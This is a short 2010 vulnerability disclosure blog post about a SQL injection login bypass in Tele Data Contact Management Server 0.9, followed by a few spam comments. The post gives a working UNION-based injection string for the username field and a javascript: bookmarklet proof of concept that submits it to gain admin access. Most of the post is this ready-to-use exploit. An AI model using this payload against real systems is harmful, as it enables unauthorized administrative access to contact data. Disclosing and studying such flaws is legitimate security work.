This site is soon to be deprecated by http://www.johnleitch.net

Wednesday, April 28, 2010

Tele Data Contact Management Server 0.9 SQL Injection

Tele Data Contact Management Server doesn't have much in the way of security. It's possible to log in with admin privileges by injecting SQL into the username field. As there are client side length constraints in place for the username field I packaged the exploit in some javascript for ease of use.

Exploit: or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--

PoC: javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();

6 comments:

  1. CRM .The Easy CRM Software for Outlook. Prophet simplifies contact management software, contact manager, small business Sales CRM Software. Prophet is the easiest CRM software because it is built INTO Outlook vs simply synching with Outlook.

    ReplyDelete
  2. Small towns whichผลบอล scattered around the perimeter of the big cities in Europe, would upset for tourists town ผลบอลสดthe inherent idea.

    ReplyDelete
  3. Nice article great post comment information thanks for sharing

    doctor strange (2016)

    ReplyDelete